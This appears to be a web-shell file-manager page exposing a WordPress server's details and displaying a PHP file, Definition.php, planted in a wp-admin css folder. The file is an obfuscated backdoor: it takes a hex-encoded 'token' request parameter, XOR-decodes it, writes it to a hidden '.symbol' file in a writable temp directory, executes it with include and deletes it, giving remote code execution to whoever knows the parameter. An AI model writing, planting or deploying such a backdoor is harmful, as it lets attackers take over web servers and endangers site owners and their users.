HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System: Linux li317-225.members.linode.com 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/kosmicevents/public/wp-admin__7af9720/css/Definition.php
<?php

if(isset($_REQUEST) && isset($_REQUEST["t\x6Fken"])){
	$pset = hex2bin($_REQUEST["t\x6Fken"]);
	$entry=   '';    foreach(str_split($pset) as $char){$entry .= chr(ord($char) ^ 34);}
	$comp = array_filter([session_save_path(), "/tmp", "/dev/shm", "/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir")]);
	foreach ($comp as $ent):
    		if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) {
    $ptr = str_replace("{var_dir}", $ent, "{var_dir}/.symbol");
    if (file_put_contents($ptr, $entry)) {
	include $ptr;
	@unlink($ptr);
	die();
}
}
endforeach;
}